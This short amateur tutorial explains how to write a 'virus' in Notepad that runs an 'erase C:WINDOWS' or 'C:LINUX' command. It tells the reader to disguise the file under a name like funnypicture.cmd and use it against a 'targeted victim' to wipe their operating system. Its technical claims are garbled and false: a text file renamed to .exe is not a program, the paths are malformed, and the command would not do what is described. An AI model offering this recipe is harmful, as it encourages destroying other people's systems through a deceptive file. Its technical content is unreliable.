How to make a Homademade Virus

Caution: This is a virus that can do alot of damage and sometimes cause the victim to rebuy Windows XP/Linux. Do NOT just use this because you are mad at a friend. I am in no way responible for anything you do

What this virus does is completely and permanently delete Windows or Linux depending. Please read the caution at the top.

1) - Write The Following In Notepad Exactly as it says

2) - Save the file as an EXE (Click File-->Save as...-->and erase what ever is there and type in something like funnystuff.exe).

3) - To test it, create a text file called "TEST.txt"(just leave it blank) and save it in 'My Documents' or something in your C: drive.
Now in a NEW notepad type "erase C:TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C: and you'll see your Test.txt is gone. Now, the real work begins:

4) - Go to Notepad and type "erase C:WINDOWS" (or C:LINUX if your targeted victim has linux) and save it again as funnypicture.cmd or something.

5) - DON'T EVER run the file or you'll lose your WINDOWS map. So, that's the virus.

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